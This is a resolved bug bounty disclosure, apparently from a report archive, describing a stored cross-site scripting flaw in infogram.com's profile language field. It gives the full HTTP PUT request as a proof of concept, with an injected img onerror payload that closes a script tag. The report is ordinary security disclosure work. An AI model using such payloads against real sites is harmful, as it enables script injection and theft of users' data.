Loading HuntDB...

Stored XSS in infogram.com via language

High
I
Infogram
Submitted None
Reported by theappsec

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Stored
The stored XSS was found in the language profile parameter. POC: Change profile settings with following request: ```http PUT /api/users/me HTTP/1.1 Host: infogram.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrf-token: **your token** X-Requested-With: XMLHttpRequest Content-Length: 135 DNT: 1 Connection: close Cookie: **your cookies** first_name=name&last_name=name&username=&confirm_password=password&language=></script><img src=x onerror=alert(document.domain)>;// ``` Go to your public profile link. example: https://infogram.com/dd_ddt7 ## Impact This allows an attacker to inject custom Javascript codes that can be used to steal information from infogram's users.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Stored